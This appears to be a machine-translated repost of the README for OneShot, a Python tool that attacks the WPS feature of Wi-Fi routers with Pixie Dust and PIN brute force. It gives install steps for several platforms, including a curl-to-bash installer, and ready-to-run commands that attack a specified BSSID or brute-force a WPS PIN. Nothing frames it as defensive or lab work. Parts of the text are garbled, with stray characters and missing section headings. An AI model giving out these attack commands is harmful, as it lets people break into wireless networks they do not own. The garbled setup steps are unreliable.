OneShot is an open source python script that executes Pixie Dust attacks without having to change the interface in operation first monitoring(monitoring).
Specifications
- Pixie Dust attack
- Built-in WPS PIN without 3WiFi connection
- Online WPS bruteforce
- Wi-Fi scanner based on iw
System requirements
- Python 3.6 and above
- Wpa supplicant
- Pixiewps
- iw
Installation
Debian/sudo apt install -y python3 wpasupplicant iw wget
Pixiewps installation
Ubuntu 18.04 and later or Debian 10 and later
sudo apt install -y pixiewps
Other editions
sudo apt install -y build-essential unzip
wget https://github.com/wiire-a/pixiewps/archive/master.zip && unzip master.zip
cd pixiewps*/
make
sudo make install
Download OneShot
cd ~
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py
Optional: download a list of vulnerable devices to pixie dust to flag in Results scan:
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt
Requirements installationς
sudo pacman -S wpa_supplicant pixiewps wget python
Download OneShot
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py
Optional: download a list of vulnerable devices in pixie dust to highlight the scan results:
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt
Alpine Linux
It can also be used to run on Appliances Android they use Linux Deploy
Installation requirements
Add the test repository:
sudo sh -c 'echo "http://dl-cdn.alpinelinux.org/alpine/edge/testing/" >> /etc/apk/repositories'
sudo apk add python3 wpa_supplicant pixiewps iw
Download OneShot
sudo wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py
Optional: download a list of vulnerable devices in pixie dust to highlight the scan results:
sudo wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt
Note that root access is required.
Use installer
curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash
Manually
Installation requirements
pkg install -y root-repo
pkg install -y git tsu python wpa-supplicant pixiewps iw
Download OneShot
git clone --depth 1 https://github.com/drygdryg/OneShot OneShot
Implementation
sudo python OneShot/oneshot.py -i wlan0 --iface-down -K
Use
Start the Pixie Dust attack on a specified BSSID:
sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
Show available networks and run a Pixie Dust attack on a specified network:
sudo python3 oneshot.py -i wlan0 -K
WPS bruteforce attack with the specified first half of the PIN:
sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
WPS connection mode:
sudo python3 oneshot.py -i wlan0 --pbc
Application snapshots

Download the program from here.
